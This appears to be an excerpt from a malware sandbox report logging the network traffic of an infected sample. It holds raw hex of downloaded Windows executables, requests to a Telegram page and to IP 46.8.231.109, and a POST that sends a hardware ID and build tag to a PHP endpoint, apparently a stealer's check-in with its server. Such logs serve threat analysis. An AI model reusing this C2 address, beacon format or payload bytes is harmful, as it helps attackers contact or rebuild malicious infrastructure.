00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:57 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:57 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:57 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:58 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:56:05 GMTContent-Type: application/octet-streamContent-Length: 328232Last-Modified: Wed, 28 Aug 2024 19:58:57 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66cf8181-50228"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 56 81 cf 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d4 04 00 00 06 00 00 00 00 00 00 5e f2 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 b7 52 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 f2 04 00 53 00 00 00 00 00 05 00 42 02 00 00 00 00 00 00 00 00 00 00 00 dc 04 00 28 26 00 00 00 20 05 00 0c 00 00 00 d0 f0 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 d2 04 00 00 20 00 00 00 d4 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 00 05 00 00 04 00 00 00 d6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 da 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 f2 04 00 00 00 00 00 48 00 00 00 02 00 05 00 98 e0 04 00 38 10 00 00 03 00 02 00 0f 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 7e 30 aa dd a7 42 95 cb 06 7e 16 66 63 df d6 a0 d8 12 38 7f e2 e9 9d 75 90 20 b8 08 26 b0 72 e1 93 c7 f4 8f 83 9b ac 8e 4b f5 22 59 60 5f 15 96 a3 a6 42 77 90 ef c5 6f 13 ea 52 a9 58 63 d2 60 d5 dd df 0c 0d a2 1f 28 6f 9c 85 6e a6 8e e0 fc b9 45 35 4c 60 73 b3 c3 8d 42 cf 26 f7 33 b8 6a 6d de fc 63 20 91 ed cd be 31 90 9c ff 58 e3 7a 96 6b 48 f4 6d 19 fd 4a 5b 5f 73 4e 91 f3 4f 8b cc a9 c0 16 08 57 c4 08 a6 0b bc bd 12 2f d1 8e 95 4d f3 33 9d b3 65 0c 7a 3a af d6 ba af ab 37 49 c5 79 1f 37 a8 4c 81 39 f6 f4 6f 20 c0 31 e0 19 f9 c3 3b 25 eb 01 b8 6e 7a 34 da ea 95 57 6c 45 6e 23 a5 37 4e bb 01 f0 f4 0b ea 3a 76 c0 ff 8a a5 4d 1a 19 f1 49 96 b2 04 43 b1 fd a2 88 6b bb 9d fe 7d f2 b7 c1 66 38 5c 78 ba 71 2b 5f e1 77 df 75 21 e9 81 94 62 5a 00 95 78 0b 42 b0 38 79 a1 2d 8c cd 5d 43 97 1b 34 95 a4 d1 35 0e 80 6b 9e 81 83 32 83 f7 2d db 35 50 f3 b3 b0 df db 89 f7 4e 9a 21 9b 57 25 fd f7 c8 06 6d 4
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:56:06 GMTContent-Type: application/octet-streamContent-Length: 196136Last-Modified: Wed, 28 Aug 2024 19:09:07 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66cf75d3-2fe28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b7 75 cf 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d0 02 00 00 06 00 00 00 00 00 00 5e ee 02 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 ad 77 03 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 ee 02 00 53 00 00 00 00 00 03 00 42 02 00 00 00 00 00 00 00 00 00 00 00 d8 02 00 28 26 00 00 00 20 03 00 0c 00 00 00 d0 ec 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 ce 02 00 00 20 00 00 00 d0 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 00 03 00 00 04 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 d6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ee 02 00 00 00 00 00 48 00 00 00 02 00 05 00 98 dc 02 00 38 10 00 00 03 00 02 00 0f 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 44 d3 a5 67 31 84 4d 3c 80 8f 5a 66 48 41 ec 5d b4 52 28 f8 87 bd a7 fe c7 d7 8f 76 ac 0c 58 37 0b 55 22 d0 37 b7 8b 2d 4f 2c 93 1d 3f 76 31 a8 83 b0 7a 11 8f a4 d2 3f 14 6c 97 0a 3e c8 b7 5e d7 10 27 10 50 4c 5e 1c 8a 6c 53 ae 0a 47 c6 63 f5 7d a5 af 50 e0 89 16 0e 80 38 b7 91 9e 6f 53 fe d6 4d de ae 16 c9 ac 5b 97 d0 bb 86 09 2d 13 1a 66 66 94 b2 63 66 bb 0b 95 48 12 c9 e7 6a c4 c7 88 c9 25 18 6e a5 92 c3 dd 1e 61 2f 3f 72 1a 52 e9 be 22 c4 19 13 ca d5 12 a0 bd fb 5d 5a 92 d4 f7 a5 6a 53 96 f1 ef 6b c3 57 ba 61 39 39 e1 d3 11 94 7c 0e 70 79 95 f8 6d c1 73 7c 81 68 85 c5 b9 ac 97 0a e6 c2 34 15 cf f0 58 37 04 a7 b6 b5 32 8d ed 9b 83 3f c5 34 50 b4 4e 15 be 12 d8 38 33 22 8e fa 70 65 e1 da 6f 02 81 c2 63 b7 96 77 74 f5 bc 6a fa d0 4c a6 5f 4b b5 af ec 17 51 40 80 15 3b 73 05 e7 d1 08 11 3f 52 4b 96 16 47 4e 00 02 26 91 63 1d ad f4 93 0f 4e 05 dc e6 13 60 a3 70 d1 32 01 1c 2b 06 59 ad 8e 45 3

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /jamelwt HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jamelwt HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=c502aee2533efa76c5_13289933752292435604
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAFBGIDHCBFHIECFCHost: 46.8.231.109Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 44 31 45 33 34 31 42 31 37 41 32 39 37 34 31 36 34 32 35 38 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 2d 2d 0d 0a Data Ascii: ------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="hwid"07D1E341B17A2974164258------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="build"default------AAEBAFBGIDHCBFHIECFC--
